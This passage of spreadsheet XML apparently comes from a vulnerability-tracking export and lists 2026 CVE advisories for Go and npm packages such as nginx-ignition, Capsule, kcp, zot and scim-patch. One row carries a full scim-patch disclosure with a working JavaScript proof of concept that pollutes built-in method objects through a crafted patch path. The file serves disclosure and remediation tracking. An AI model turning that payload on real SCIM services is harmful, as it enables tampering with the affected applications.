          <t>CVE-2026-58464</t>
        </is>
      </c>
      <c r="D326" s="5" t="inlineStr"/>
      <c r="E326" s="5" t="inlineStr"/>
      <c r="F326" s="5" t="inlineStr"/>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr"/>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58464</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6062</t>
        </is>
      </c>
      <c r="D327" s="5" t="inlineStr"/>
      <c r="E327" s="5" t="inlineStr"/>
      <c r="F327" s="5" t="inlineStr"/>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M327" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr"/>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't validate channel ownership of an existing subscription before applying edits in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6062</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61554</t>
        </is>
      </c>
      <c r="D328" s="5" t="inlineStr"/>
      <c r="E328" s="5" t="inlineStr"/>
      <c r="F328" s="5" t="inlineStr"/>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/jm33-m0/emp3r0r/core</t>
        </is>
      </c>
      <c r="M328" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260531142011-aed3d81641ab</t>
        </is>
      </c>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr"/>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>emp3r0r has an unauthenticated HTTP Polling DoS in github.com/jm33-m0/emp3r0r/core</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61554</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61628</t>
        </is>
      </c>
      <c r="D329" s="5" t="inlineStr"/>
      <c r="E329" s="5" t="inlineStr"/>
      <c r="F329" s="5" t="inlineStr"/>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr"/>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has Unauthenticated Admin Account Creation via Onboarding Race Condition in github.com/lucasdillmann/nginx-ignition.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github.com/lucasdillmann/nginx-ignition before v0.0.0-20260621194639-0586b4e55ab.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61628</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61629</t>
        </is>
      </c>
      <c r="D330" s="5" t="inlineStr"/>
      <c r="E330" s="5" t="inlineStr"/>
      <c r="F330" s="5" t="inlineStr"/>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M330" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260526022344-0c988fc1277c</t>
        </is>
      </c>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr"/>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has ParseAcceptLanguage `_` separator bypass that enables ~75x CPU amplification via Accept-Language header in i18nMiddleware in github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61629</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61630</t>
        </is>
      </c>
      <c r="D331" s="5" t="inlineStr"/>
      <c r="E331" s="5" t="inlineStr"/>
      <c r="F331" s="5" t="inlineStr"/>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M331" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260328015550-8d35e1eb5dd6</t>
        </is>
      </c>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr"/>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has TOTP Reuse During Validity Window in github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61630</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61672</t>
        </is>
      </c>
      <c r="D332" s="5" t="inlineStr"/>
      <c r="E332" s="5" t="inlineStr"/>
      <c r="F332" s="5" t="inlineStr"/>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M332" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr"/>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>Capsule: Tenant owner bypasses Capsule's forbidden namespace/service/node label and annotation enforcement in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61672</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61682</t>
        </is>
      </c>
      <c r="D333" s="5" t="inlineStr"/>
      <c r="E333" s="5" t="inlineStr"/>
      <c r="F333" s="5" t="inlineStr"/>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/kcp-dev/kcp</t>
        </is>
      </c>
      <c r="M333" s="5" t="inlineStr">
        <is>
          <t>0.31.4, 0.32.2</t>
        </is>
      </c>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr"/>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>kcp front-proxy does not strip inbound X-Remote-* identity headers, allowing any authenticated client to inject groups/warrants and impersonate system:masters in any workspace in github.com/kcp-dev/kcp</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61682</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61687</t>
        </is>
      </c>
      <c r="D334" s="5" t="inlineStr"/>
      <c r="E334" s="5" t="inlineStr"/>
      <c r="F334" s="5" t="inlineStr"/>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/hatchet-dev/hatchet</t>
        </is>
      </c>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr"/>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>Hatchet - Unauthenticated OAuth state CSRF / login-CSRF via empty-state collision in ValidateOAuthState in hatchet in github.com/hatchet-dev/hatchet.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github.com/hatchet-dev/hatchet before v0.91.1.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61687</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61709</t>
        </is>
      </c>
      <c r="D335" s="5" t="inlineStr"/>
      <c r="E335" s="5" t="inlineStr"/>
      <c r="F335" s="5" t="inlineStr"/>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/openfga/openfga</t>
        </is>
      </c>
      <c r="M335" s="5" t="inlineStr">
        <is>
          <t>1.18.1</t>
        </is>
      </c>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr"/>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>OpenFGA: ListUsers returns a deliberately-excluded user when a `but not` exclusion under a type-bound wildcard is intersected (`and`) with another relation that also grants that user in github.com/openfga/openfga</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61709</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61794</t>
        </is>
      </c>
      <c r="D336" s="5" t="inlineStr"/>
      <c r="E336" s="5" t="inlineStr"/>
      <c r="F336" s="5" t="inlineStr"/>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M336" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr"/>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Capsule: Malformed ForbiddenAnnotations.Regex can bypass Tenant validation and trigger namespace admission panic in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61794</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61795</t>
        </is>
      </c>
      <c r="D337" s="5" t="inlineStr"/>
      <c r="E337" s="5" t="inlineStr"/>
      <c r="F337" s="5" t="inlineStr"/>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M337" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr"/>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>Capsule: hostnameRegexHandler.OnUpdate validates stale (old) Tenant regex, allowing invalid AllowedHostnames regex to bypass webhook validation in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61795</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61833</t>
        </is>
      </c>
      <c r="D338" s="5" t="inlineStr"/>
      <c r="E338" s="5" t="inlineStr"/>
      <c r="F338" s="5" t="inlineStr"/>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr">
        <is>
          <t>Go:zotregistry.dev/zot, Go:zotregistry.dev/zot/v2</t>
        </is>
      </c>
      <c r="M338" s="5" t="inlineStr">
        <is>
          <t>2.1.18</t>
        </is>
      </c>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr"/>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>zot: Bearer authentication maps DELETE to push scope, allowing unauthorized deletion in zotregistry.dev/zot</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61833</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61834</t>
        </is>
      </c>
      <c r="D339" s="5" t="inlineStr"/>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr">
        <is>
          <t>npm:scim-patch</t>
        </is>
      </c>
      <c r="M339" s="5" t="inlineStr">
        <is>
          <t>0.9.2</t>
        </is>
      </c>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr"/>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>## Summary
Incomplete Prototype Pollution Fix Allows Mutation of Inherited Built-in Method Objects
`scim-patch` blocks direct dangerous path segments such as `__proto__`, `constructor`, and `prototype`, but still traverses inherited properties when applying SCIM patch paths.
An attacker who controls a SCIM PATCH operation can use paths such as `toString.polluted` to mutate shared built-in function objects, for example `Object.prototype.toString`.
## Impact
A malicious patch can add attacker-controlled properties to inherited built-in method objects. The impact is narrower than direct `Object.prototype` pollution, but the mutation is process-global and may affect application logic that reads properties from inherited methods.
## Details
Affected code paths:
- `navigate()` reads inherited properties via `schema[subPath]`
- `assign()` uses `key in obj`, which treats inherited properties as existing
Because inherited keys are followed, safe-looking path segments such as `toString` can resolve to shared built-in objects.
## PoC
```js
const assert = require("node:assert/strict");
const { scimPatch } = require("./lib/src/scimPatch");
const victim = {
  schemas: ["urn:ietf:params:scim:schemas:core:2.0:User"],
  userName: "alice",
  active: true,
  emails: [{ value: "alice@example.com", primary: true }],
  meta: { created: "x", lastModified: "x", resourceType: "User" }
};
try {
  assert.equal(({}).toString.scimPatchPolluted, undefined);
  scimPatch(victim, [
    { op: "add", path: "toString.scimPatchPolluted", value: "polluted" }
  ]);
  assert.equal(({}).toString.scimPatchPolluted, "polluted");
  console.log(({}).toString.scimPatchPolluted);
} finally {
  delete Object.prototype.toString.scimPatchPolluted;
}
```
Output:
```text
polluted
```
A no-path operation with a dotted value key is also affected:
```js
scimPatch(victim, [
  { op: "add", value: { "toString.noPathPolluted": "polluted" } }
]);
```
## Remediation
Do not traverse inherited properties while resolving patch paths. Use own-property checks such as `Object.hasOwn(obj, key)` and create missing containers only for safe own keys.
Keep the existing denylist for `__proto__`, `constructor`, and `prototype` as defense in depth.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61834</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63199</t>
        </is>
      </c>
      <c r="D340" s="5" t="inlineStr"/>
      <c r="E340" s="5" t="inlineStr"/>
      <c r="F340" s="5" t="inlineStr"/>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M340" s="5" t="inlineStr">
        <is>
          <t>0.54.0-rc.0</t>
        </is>
      </c>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr"/>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Perses's missing authorization in datasource proxy allows cross-scope secret disclosure in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63199</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63405</t>
        </is>
      </c>
      <c r="D341" s="5" t="inlineStr"/>
      <c r="E341" s="5" t="inlineStr"/>
      <c r="F341" s="5" t="inlineStr"/>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/anycable/anycable-go</t>
        </is>
      </c>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr"/>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>AnyCable: Pusher REST API Does Not Verify Request Body MD5 Enabling Signed-Request Replay with Arbitrary Body in github.com/anycable/anycable-go.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github.com/anycable/anycable-go before v1.6.15.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63405</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63406</t>
        </is>
      </c>
      <c r="D342" s="5" t="inlineStr"/>
      <c r="E342" s="5" t="inlineStr"/>
      <c r="F342" s="5" t="inlineStr"/>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/anycable/anycable-go</t>
        </is>
      </c>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
